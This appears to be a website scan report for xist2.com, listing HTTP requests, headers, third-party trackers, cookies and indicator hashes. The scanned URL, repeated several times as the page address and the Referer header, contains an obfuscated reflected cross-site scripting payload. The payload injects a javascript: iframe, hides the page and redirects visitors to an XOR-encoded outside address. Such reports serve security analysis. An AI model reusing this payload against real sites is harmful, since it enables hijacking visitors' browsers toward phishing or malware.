URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2600:9000:2156:d600:11:bd8b:3000:93a1 , United States, ASN16509 (AMAZON-02, US),
Reverse DNS
Software
AmazonS3 /
Resource Hash
fcca2275718bd330f1dd63e122a513ef6fc051296d589e751e663b981ca6d3bc

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:09:22 GMT
x-amz-meta-cache-control
max-age=0
content-encoding
gzip
last-modified
Sat, 13 Apr 2024 06:03:36 GMT
server
AmazonS3
via
1.1 cdb2dba3874dd4d7b53213b8c63a0996.cloudfront.net (CloudFront)
x-amz-cf-pop
FRA50-C1
etag
W/"d3f0b70b935ccc1b6600bedeed681f4a"
x-amz-server-side-encryption
AES256
vary
Accept-Encoding
x-cache
Hit from cloudfront
content-type
application/javascript
cache-control
max-age=0
age
2947
x-amz-cf-id
a5yH7gD2MQlC-eOaC0xOfMnMYDwEvQEwOnpSIA6UQcR2OqOlsDijAA==
admin-ajax.php
xist2.com/wp-admin/ 		2 KB
1 KB 		XHR
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-admin/admin-ajax.php?action=cli_get_settings_json
Requested by
Host: xist2.com
URL: https://xist2.com/wp-includes/js/jquery/jquery.js
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
5ef5d229d3ce23894b109035c5b2fd43055724a9f255efa10ac177fd29c0a868
Security Headers
Name Value
X-Content-Type-Options nosniff
X-Frame-Options SAMEORIGIN

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept
application/json, text/javascript, */*; q=0.01
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
X-Requested-With
XMLHttpRequest
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:29 GMT
content-encoding
br
x-content-type-options
nosniff
cf-cache-status
DYNAMIC
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
alt-svc
h3=":443"; ma=86400
referrer-policy
strict-origin-when-cross-origin
server
cloudflare
x-frame-options
SAMEORIGIN
vary
Accept-Encoding
content-type
text/html; charset=UTF-8
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47KuruBayS03cXK%2BMthoBkjpwpPUa3ahQcaxAtxZ2Ol3csRnjj5Zz8PCjn37m%2BLK0M1ZA7PyfYwkfpglISaZXWmtGkOJwtaJzHEtEkbaBM5Aqmt8Y5ZX8YjhoN0%3D"}],"group":"cf-nel","max_age":604800}
cache-control
no-cache, must-revalidate, max-age=0
x-robots-tag
noindex
cf-ray
87cacb1b5fcca000-AMS
expires
Wed, 11 Jan 1984 05:00:00 GMT
psimg.gif
pagesense-collect.zoho.com/ 		42 B
443 B 		XHR
General
Check archive.org
Download Go to
Full URL
https://pagesense-collect.zoho.com/psimg.gif?type=21&domainname=xist2
Requested by
Host: cdn.pagesense.io
URL: https://cdn.pagesense.io/js/xist2/b38d1a98da9b43a98a551a4b47a97f5c.js
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
136.143.191.190 , United States, ASN2639 (ZOHO-AS, US),
Reverse DNS
Software
ZGS /
Resource Hash
1866961a029c65376fefb7f2ba1e6187e09ff50ea58d97dedfd72c197947d002
Security Headers
Name Value
Strict-Transport-Security max-age=63072000
X-Content-Type-Options nosniff
X-Frame-Options DENY

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
sec-ch-ua-platform
"Win32"
Referer
https://xist2.com/
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Type
text/plain

Response headers

date
Tue, 30 Apr 2024 21:58:29 GMT
strict-transport-security
max-age=63072000
x-content-type-options
nosniff
server
ZGS
x-frame-options
DENY
content-type
image/gif;charset=UTF-8
access-control-allow-origin
*
content-disposition
attachment; filename="psimg.gif"
content-length
42
psimg.gif
pagesense-collect.zoho.com/ 		42 B
445 B 		XHR
General
Check archive.org
Download Go to
Full URL
https://pagesense-collect.zoho.com/psimg.gif?type=1&domainname=xist2
Requested by
Host: cdn.pagesense.io
URL: https://cdn.pagesense.io/js/xist2/b38d1a98da9b43a98a551a4b47a97f5c.js
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
136.143.191.190 , United States, ASN2639 (ZOHO-AS, US),
Reverse DNS
Software
ZGS /
Resource Hash
1866961a029c65376fefb7f2ba1e6187e09ff50ea58d97dedfd72c197947d002
Security Headers
Name Value
Strict-Transport-Security max-age=63072000
X-Content-Type-Options nosniff
X-Frame-Options DENY

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
sec-ch-ua-platform
"Win32"
Referer
https://xist2.com/
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Type
text/plain

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
strict-transport-security
max-age=63072000
x-content-type-options
nosniff
server
ZGS
x-frame-options
DENY
content-type
image/gif;charset=UTF-8
access-control-allow-origin
*
content-disposition
attachment; filename="psimg.gif"
content-length
42
heatmapscript-ee77722975_.js
static.zohocdn.com/pagesense/tracking/ 		24 KB
8 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://static.zohocdn.com/pagesense/tracking/heatmapscript-ee77722975_.js
Requested by
Host: cdn.pagesense.io
URL: https://cdn.pagesense.io/js/xist2/b38d1a98da9b43a98a551a4b47a97f5c.js
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
89.36.170.147 Schlierbach, Switzerland, ASN41913 (COMPUTERLINE Computerline, Schlierbach, Switzerland, CH),
Reverse DNS
zoho-170-147.dub3.computerline.net
Software
ZGS /
Resource Hash
20629f25d8e6cad74cbb85b073bb598d5a91512b233f5c0546c614670cd3b7ef
Security Headers
Name Value
Strict-Transport-Security max-age=15768000, max-age=63072000
X-Content-Type-Options nosniff
X-Xss-Protection 1

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
x-content-type-options
nosniff
strict-transport-security
max-age=15768000, max-age=63072000
x-cache
HIT
cross-origin-resource-policy
cross-origin
content-length
7841
x-xss-protection
1
last-modified
Fri, 12 May 2023 11:50:31 GMT
server
ZGS
nb-request-id
98df858f6225d63e4db683317a3d64e0
etag
"4b4affcd99c549a57ed369bd3232f452"
vary
Accept-Encoding
content-type
application/javascript;charset=UTF-8
content-language
en-US
access-control-allow-origin
*
access-control-expose-headers
*
cache-control
public, max-age=2629743, immutable
z-origin-id
ex1-5842e8e0ee5d49c7a151099554e0b80e
accept-ranges
bytes
timing-allow-origin
*
cropped-favicon-32x32.jpg
xist2.com/wp-content/uploads/2020/07/ 		573 B
1014 B 		Other
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-content/uploads/2020/07/cropped-favicon-32x32.jpg
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
e043a62b2164820ef6f36994b5338273055b2b261f951308602f2b5557d68d39

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
cf-cache-status
DYNAMIC
last-modified
Thu, 09 Jul 2020 16:53:36 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
"5f074b90-23d"
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TnDrqywo1YzAGQ638I5RKSADc6D1G8LnF8e%2FIVcvK4y9nI2PnMG%2Fvp2NtHo%2FaPbAr%2BanZEt1QQm2ijb8vxJPNnXDDGt%2F5UEB2zIvMA6Ga0%2FBhvQSmpTuGhdywNU%3D"}],"group":"cf-nel","max_age":604800}
content-type
image/jpeg
cache-control
public, max-age=2592000
accept-ranges
bytes
cf-ray
87cacb1bf842a000-AMS
alt-svc
h3=":443"; ma=86400
content-length
573
/
ipapi.co/json/ 		789 B
887 B 		XHR
General
Check archive.org
Download Go to
Full URL
https://ipapi.co/json/
Requested by
Host: xist2.com
URL: https://xist2.com/wp-includes/js/jquery/jquery.js
Protocol
H2
Security
TLS 1.2, ECDHE_ECDSA, AES_128_GCM
Server
2606:4700:20::681a:92c , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
58b5230dd42e9f065a5017ac7e81c627e6f380ae4bdd8abd2c5f5709736b3b0f
Security Headers
Name Value
X-Content-Type-Options nosniff
X-Frame-Options DENY

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Accept
application/json, text/javascript, */*; q=0.01
Referer
https://xist2.com/
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:29 GMT
content-encoding
br
x-content-type-options
nosniff
referrer-policy
same-origin
cf-cache-status
DYNAMIC
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
vary
Host, origin
allow
POST, OPTIONS, GET, HEAD, OPTIONS
content-type
application/json
access-control-allow-origin
https://xist2.com
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8CtWGtDP1I2WCvIVTTZXRqnqKEohLq2SLlxkDGpJ25f4kFeyWzuSKSb84KZGagb2xIHU%2FSvOr9SPU03lakE1q4Q%2Ff8ixHH5i4WfHqHSxEI9qpWYYTdrKil4MVdzukXJP1C5lgvvd"}],"group":"cf-nel","max_age":604800}
x-frame-options
DENY
cf-ray
87cacb20ca530e7e-AMS

Verdicts & Comments Add Verdict or Comment

30 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| 0 function| gtag object| dataLayer undefined| $ function| jQuery object| Cli_Data object| log_object object| CLI_Cookie object| CLI object| cliBlocker string| CLI_ACCEPT_COOKIE_NAME string| CLI_PREFERNCE_COOKIE number| CLI_ACCEPT_COOKIE_EXPIRE boolean| CLI_COOKIEBAR_AS_POPUP string| ajaxurl object| ZAB object| zps object| _zps object| Zepto function| localZepto object| $pagesense object| pagesense object| optimize number| _zid object| ps_heatmapscript boolean| ZAB.loadHeatmapScript object| Trunc object| srcReplaceableElms string| cliConsent object| categories

8 Cookies

Domain/Path Name / Value
xist2.com/ Name: zabUserId
Value: 1714514308443zabu0.38622586536771353
.xist2.com/ Name: zscb38d1a98da9b43a98a551a4b47a97f5c
Value: 1714514308461zsc0.8059703353782663
.xist2.com/ Name: zft-sdc
Value: isef%3Dtrue-isfr%3Dtrue-src%3Ddirect
.xist2.com/ Name: zps-tgr-dts
Value: sc%3D1-expAppOnNewSession%3D%5B%5D-pc%3D1-sesst%3D1714514308462
.xist2.com/ Name: zabHMBucket
Value: dBiX1At
xist2.com/ Name: viewed_cookie_policy
Value: yes
xist2.com/ Name: cli_user_preference
Value: en-cli-yes
xist2.com/ Name: CookieLawInfoConsent
Value: eyJ2ZXIiOiIxIn0=

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

cdn.pagesense.io
ipapi.co
pagesense-collect.zoho.com
static.zohocdn.com
xist2.com
136.143.191.190
188.114.97.3
2600:9000:2156:d600:11:bd8b:3000:93a1
2606:4700:20::681a:92c
89.36.170.147
09f417c2e643b736c19e96b99e166681af1002e9b192b84e4e85b0794e764f7f
13f29d7e98ff4dc90831ac3586ffb4506fb25683985541f52bcaafc92fe89d86
1866961a029c65376fefb7f2ba1e6187e09ff50ea58d97dedfd72c197947d002
1e7f83052e1e3442c4397ced9555033cd1d3f08444d85960683bcf91c8433cdb
20629f25d8e6cad74cbb85b073bb598d5a91512b233f5c0546c614670cd3b7ef
3a3947cbfe82302adcb4d05895110ccc02317c08596e7065646641a62335fb3d
58b5230dd42e9f065a5017ac7e81c627e6f380ae4bdd8abd2c5f5709736b3b0f
5ae91d9c3d7b9154dcac417c3774d6dfa730577699be9c8a390c42dccff7e579
5ef5d229d3ce23894b109035c5b2fd43055724a9f255efa10ac177fd29c0a868
60e06f35a0717740bdd568e418abb5927cbb01fddba56ce360dffc7b2389b7f7
9f7c93939a623953d8b800c61b25e8b4788c35babf7746378052656a605cf8a0
a914dcbc1a475591ca1493cc05020c4d6e32b2d24d5e0094a13840ed00ca0038
aaa9e669c49304ed25c07f1ce7b79f159fda7d552a04364ea303f380f5d757e2
d515810116a5165c3d0b2ebd3f5dc01beb5a2d2c3250d7aba4254615538f5cde
d56a379bef04b355d6f8dd825bb62453ea7432ea582489c41f1311b1aed99902
dfd056566707adc0c8fe7ddf3bdc23481860e2463129a2c18537607bc9933ef1
e043a62b2164820ef6f36994b5338273055b2b261f951308602f2b5557d68d39
e915f291ea9b33ef259ab52a27978fad4b76b2c7575f6c5aad4390ff20c473a9
f0f770dd3302199dd3ae22f8fa5946a27506a9317f6e049e8f632db4d0e9c3d3
fcca2275718bd330f1dd63e122a513ef6fc051296d589e751e663b981ca6d3bc